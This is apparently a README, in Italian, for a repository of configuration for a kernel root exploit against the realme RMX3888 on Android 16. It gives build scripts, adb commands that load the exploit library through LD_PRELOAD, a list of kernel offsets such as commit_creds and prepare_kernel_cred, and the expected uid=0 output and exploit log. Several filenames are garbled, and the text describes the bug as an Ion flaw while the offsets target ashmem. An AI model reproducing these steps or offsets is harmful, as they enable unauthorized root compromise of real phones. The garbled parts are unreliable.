
rmx3888-cve-2026-43499-config v0.2.0
CVE-2026-43499 configurazione dell'exploit per realme RMX3888 (Android 16) - 20 offset del kernel verificati
Configurazione dell'Exploit CVE-2026-43499 per realme RMX3888
Informazioni sul Dispositivo
- Marca/Modello: realme RMX3888
- Versione Android: 16 (SDK 36)
- Build ID: BP2A.250605.015
- Kernel: Linux 6.1.141-android14-11-o-gffc54a6d2287
- SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
- Architettura: ARM64 (aarch64)
Panoramica
Questo repository contiene i file di configurazione completi per l'exploit CVE-2026-43499 (GhostLock) che ha come target il dispositivo realme RMX3888. Tutti gli offset del kernel sono stati estratti e verificati dal boot.img del dispositivo.
Funzionalità
✓ 20 offset del kernel verificati estratti da vmlinux
✓ Logging in tempo reale con O_SYNC + fsync per la sicurezza in caso di kernel panic
✓ Configurazione specifica per il dispositivo RMX3888
✓ Script di compilazione con un clic con rilevamento automatico dell'NDK
✓ Documentazione completa con guide alla compilazione
File Inclusi
File di Configurazione
- arget.h - Offset del kernel specifici per il dispositivo (20 offset verificati)
- common.h - Configurazione di compilazione con integrazione del logging
ealtime_log.h - Implementazione del logging in tempo reale
Documentazione
- BUILD_GUIDE.md - Guida completa alla compilazione
eport.md - Rapporto di analisi dettagliato (Round 1)
ound2_report.md - Rapporto di configurazione (Round 2)
- ROUND2_STATUS.md - Riepilogo dello stato di esecuzione
- compile_status.json - Stato di compilazione leggibile da macchina
Script
- compile_rmx3888.sh - Script di compilazione con un clic
Avvio Rapido
Prerequisiti
- Android NDK r26d o successivo
- Ambiente Git Bash, Linux/WSL o Termux
Compilazione
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Su Windows Git Bash, lo script rileva automaticamente il percorso SDK predefinito utilizzato da Android Studio e dagli strumenti da riga di comando: /c/Android/Sdk/ndk/*.
Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ utilizzano attualmente fallback compatibili con la compilazione nell'header del target RMX3888. Sostituiscili con gli offset vmlinux RMX3888 verificati prima di fare affidamento sul comportamento a runtime.
Utilizzo
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
Offset Principali
Gli offset principali riportati di seguito sono stati estratti dal kernel 6.1.141. Consulta la nota precedente per le voci di fallback compatibili con la compilazione che richiedono ancora una verifica specifica per RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
Funzionalità di Logging
Il modulo di logging in tempo reale integrato fornisce:
- Percorso di log primario: /sdcard/Download/log_.txt
- Percorso di fallback: /data/local/tmp/log_.txt
- Sicuro contro il kernel panic: utilizza O_SYNC + fsync() per la scrittura immediata su disco
- Voci con timestamp: tutte le voci di log includono timestamp precisi
- Mirror su stderr: i log vengono inoltre emessi su stderr per adb logcat
Risultati Attesi
Sfruttamento Riuscito
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
Output del File di Log
` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Risoluzione dei Problemi
Consulta BUILD_GUIDE.md per istruzioni dettagliate sulla risoluzione dei problemi, tra cui:
- Errori di compilazione
- Crash a runtime
- Problemi di bypass di KASLR
- Blocchi delle policy SELinux
Avviso di Sicurezza
⚠️ AVVERTENZA: questa configurazione è destinata esclusivamente alla ricerca sulla sicurezza autorizzata.
- Utilizza solo su dispositivi di tua proprietà
- Non distribuire binari compilati senza autorizzazione
- Rispetta le pratiche di divulgazione responsabile
- I file di log possono contenere informazioni di sistema sensibili
Dettagli Tecnici
Processo di Estrazione
- Boot.img decompresso tramite il parser Android Boot Image v4
- vmlinux estratto tramite vmlinux-to-elf (102.871 simboli)
- 99.580 simboli validi analizzati ed esaminati
- 20 offset critici convalidati in modo incrociato
- Verifica degli offset tramite controlli di coerenza degli indirizzi dei simboli
Verifica degli Offset
- Indirizzo base del kernel confermato: 0xffffffc008000000
- Tutti gli indirizzi dei simboli validati rispetto al layout di memoria
- Riferimenti incrociati con il dispositivo di riferimento (Google Pixel tokay)
- Tasso di successo di estrazione del 100% (20/20 offset)
Riferimenti
- CVE-2026-43499: GhostLock - Vulnerabilità UAF nell'allocatore Ion
- Sorgente dell'Exploit: https://github.com/NebuSec/CyberMeowfia
- Dispositivo Target: realme RMX3888 (Snapdragon 8 Gen 3)
Licenza
Questa configurazione è fornita esclusivamente per scopi educativi e di ricerca sulla sicurezza.
Esclusione di Responsabilità
Questo repository contiene materiali di ricerca sulla sicurezza. Gli autori e i contributori non sono responsabili per qualsiasi uso improprio o danno causato da questo codice. Utilizzalo a tuo rischio e pericolo e solo su dispositivi di tua proprietà o per i quali disponi di esplicita autorizzazione al test.
Generato: 2026-07-23
Versione del Kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verifica degli Offset: 100% (20/20)
Stato: Pronto per la compilazione